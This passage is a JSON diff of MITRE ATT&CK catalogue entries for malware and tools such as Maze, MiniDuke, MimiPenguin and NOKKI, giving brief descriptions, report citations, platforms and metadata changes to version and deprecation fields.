Retrieved September 29, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" + }, + { + "source_name": "Villeneuve 2011", + "description": "Villeneuve, N., Sancho, D. (2011). THE \u201cLURID\u201d DOWNLOADER. Retrieved November 12, 2014.", + "url": "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-lurid-apt.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Lurid", + "Enfal" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:51.586000+00:00\", \"old_value\": \"2025-04-16 20:37:58.843000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-11 21:41:19.008000+00:00", + "modified": "2025-04-25 14:44:11.465000+00:00", + "name": "MESSAGETAP", + "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. 
(Citation: FireEye MESSAGETAP October 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0443", + "external_id": "S0443" + }, + { + "source_name": "FireEye MESSAGETAP October 2019", + "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MESSAGETAP" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:11.465000+00:00\", \"old_value\": \"2025-04-16 20:38:26.051000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--049ff071-0b3c-4712-95d2-d21c6aa54501", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:42:32.856000+00:00", + "name": "MURKYTOP", + "description": "[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). 
(Citation: FireEye Periscope March 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0233", + "external_id": "S0233" + }, + { + "source_name": "MURKYTOP", + "description": "(Citation: FireEye Periscope March 2018)" + }, + { + "source_name": "FireEye Periscope March 2018", + "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MURKYTOP" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:32.856000+00:00\", \"old_value\": \"2025-04-16 20:37:52.514000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f72251cb-2be5-421f-a081-99c29a1209e7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:45:06.639000+00:00", + "name": "MacSpy", + "description": "[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb (Citation: objsee mac malware 2017).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/software/S0282", + "external_id": "S0282" + }, + { + "source_name": "MacSpy", + "description": "(Citation: objsee mac malware 2017)." + }, + { + "source_name": "objsee mac malware 2017", + "description": "Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.", + "url": "https://objective-see.com/blog/blog_0x25.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MacSpy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:06.639000+00:00\", \"old_value\": \"2025-04-16 20:38:44.003000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--532c6004-b1e8-415b-9516-f7c14ba783b1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-28 17:48:36.547000+00:00", + "modified": "2025-04-25 14:43:19.128000+00:00", + "name": "MarkiRAT", + "description": "[MarkiRAT](https://attack.mitre.org/software/S0652) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://attack.mitre.org/groups/G0137) since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0652", + "external_id": "S0652" + }, + { + "source_name": "Kaspersky Ferocious Kitten Jun 2021", + "description": "GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. 
Retrieved September 22, 2021.", + "url": "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MarkiRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:19.128000+00:00\", \"old_value\": \"2025-04-16 20:38:07.387000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-18 16:17:59.464000+00:00", + "modified": "2025-04-25 14:44:49.604000+00:00", + "name": "Maze", + "description": "[Maze](https://attack.mitre.org/software/S0449) ransomware, previously known as \"ChaCha\", was discovered in May 2019. 
In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0449", + "external_id": "S0449" + }, + { + "source_name": "FireEye Maze May 2020", + "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html" + }, + { + "source_name": "McAfee Maze March 2020", + "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/" + }, + { + "source_name": "Sophos Maze VM September 2020", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. 
Retrieved October 9, 2020.", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Maze" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "SarathKumar Rajendran, Trimble Inc" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:49.604000+00:00\", \"old_value\": \"2025-04-16 20:38:37.773000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-27 19:05:29.386000+00:00", + "modified": "2025-04-25 14:44:52.837000+00:00", + "name": "MechaFlounder", + "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) is a python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload uses a combination of actor developed code and code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0459", + "external_id": "S0459" + }, + { + "source_name": "Unit 42 MechaFlounder March 2019", + "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. 
Retrieved May 27, 2020.", + "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MechaFlounder" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:52.837000+00:00\", \"old_value\": \"2025-04-16 20:38:38.886000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--5a33468d-844d-4b1f-98c9-0e786c556b27", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:45:19.566000+00:00", + "name": "MimiPenguin", + "description": "[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0179", + "external_id": "S0179" + }, + { + "source_name": "MimiPenguin GitHub May 2017", + "description": "Gregal, H. (2017, May 12). MimiPenguin. 
Retrieved December 5, 2017.", + "url": "https://github.com/huntergregal/mimipenguin" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MimiPenguin" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:19.566000+00:00\", \"old_value\": \"2025-04-16 20:38:52.183000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:36.919000+00:00", + "modified": "2025-04-25 14:43:31.760000+00:00", + "name": "MiniDuke", + "description": "[MiniDuke](https://attack.mitre.org/software/S0051) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. The [MiniDuke](https://attack.mitre.org/software/S0051) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://attack.mitre.org/software/S0051) components as well as in conjunction with [CosmicDuke](https://attack.mitre.org/software/S0050) and [PinchDuke](https://attack.mitre.org/software/S0048). (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0051", + "external_id": "S0051" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). 
The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MiniDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:31.760000+00:00\", \"old_value\": \"2025-04-16 20:38:12.056000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:53.681000+00:00", + "modified": "2025-04-25 14:43:09.588000+00:00", + "name": "MobileOrder", + "description": "[MobileOrder](https://attack.mitre.org/software/S0079) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0079", + "external_id": "S0079" + }, + { + "source_name": "Scarlet Mimic Jan 2016", + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. 
Retrieved February 10, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:09.588000+00:00\", \"old_value\": \"2025-04-16 20:38:04.825000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--8a59f456-79a0-4151-9f56-9b1a67332af2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-28 22:09:15.461000+00:00", + "modified": "2025-04-25 14:43:57.040000+00:00", + "name": "MoleNet", + "description": "[MoleNet](https://attack.mitre.org/software/S0553) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.(Citation: Cybereason Molerats Dec 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0553", + "external_id": "S0553" + }, + { + "source_name": "MoleNet", + "description": "(Citation: Cybereason Molerats Dec 2020)" + }, + { + "source_name": "Cybereason Molerats Dec 2020", + "description": "Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. 
Retrieved December 22, 2020.", + "url": "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MoleNet" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:57.040000+00:00\", \"old_value\": \"2025-04-16 20:38:21.182000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--9ea525fa-b0a9-4dde-84f2-bcea0137b3c1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:27.016000+00:00", + "modified": "2025-04-25 14:44:13.834000+00:00", + "name": "MoonWind", + "description": "[MoonWind](https://attack.mitre.org/software/S0149) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0149", + "external_id": "S0149" + }, + { + "source_name": "Palo Alto MoonWind March 2017", + "description": "Miller-Osborn, J. and Grunzweig, J.. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. 
Retrieved March 30, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MoonWind" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:13.834000+00:00\", \"old_value\": \"2025-04-16 20:38:27.217000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--b63970b7-ddfb-4aee-97b1-80d335e033a8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-17 15:26:20.015000+00:00", + "modified": "2025-04-25 14:45:26.872000+00:00", + "name": "NBTscan", + "description": "[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0590", + "external_id": "S0590" + }, + { + "source_name": "Debian nbtscan Nov 2019", + "description": "Bezroutchko, A. (2019, November 19). NBTscan man page. Retrieved March 17, 2021.", + "url": "https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html" + }, + { + "source_name": "SecTools nbtscan June 2003", + "description": "SecTools. (2003, June 11). NBTscan. 
Retrieved March 17, 2021.", + "url": "https://sectools.org/tool/nbtscan/" + }, + { + "source_name": "Symantec Waterbug Jun 2019", + "description": "Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.", + "url": "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments" + }, + { + "source_name": "FireEye APT39 Jan 2019", + "description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "NBTscan" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:26.872000+00:00\", \"old_value\": \"2025-04-16 20:38:55.369000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--d1183cb9-258e-4f2f-8415-50ac8252c49e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:44.759000+00:00", + "name": "NDiskMonitor", + "description": "[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to 
[Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0272", + "external_id": "S0272" + }, + { + "source_name": "NDiskMonitor", + "description": "(Citation: TrendMicro Patchwork Dec 2017)" + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "NDiskMonitor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:44.759000+00:00\", \"old_value\": \"2025-04-16 20:38:36.313000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-30 19:50:45.307000+00:00", + "modified": "2025-04-25 14:42:35.581000+00:00", + "name": "NOKKI", + "description": "[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. 
[NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0353", + "external_id": "S0353" + }, + { + "source_name": "NOKKI", + "description": "(Citation: Unit 42 NOKKI Sept 2018)" + }, + { + "source_name": "Unit 42 NOKKI Sept 2018", + "description": "Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/" + }, + { + "source_name": "Unit 42 Nokki Oct 2018", + "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. 
Retrieved November 5, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "NOKKI" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:35.581000+00:00\", \"old_value\": \"2025-04-16 20:37:53.448000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b4783be3-35d9-4a56-ac8d-1f3e1c9d9a84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-04 19:36:55.518000+00:00", + "modified": "2025-04-25 14:44:28.081000+00:00", + "name": "NativeZone", + "description": "[NativeZone](https://attack.mitre.org/software/S0637) is the name given collectively to disposable custom [Cobalt Strike](https://attack.mitre.org/software/S0154) loaders used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0637", + "external_id": "S0637" + }, + { + "source_name": "MSTIC Nobelium Toolset May 2021", + "description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. 
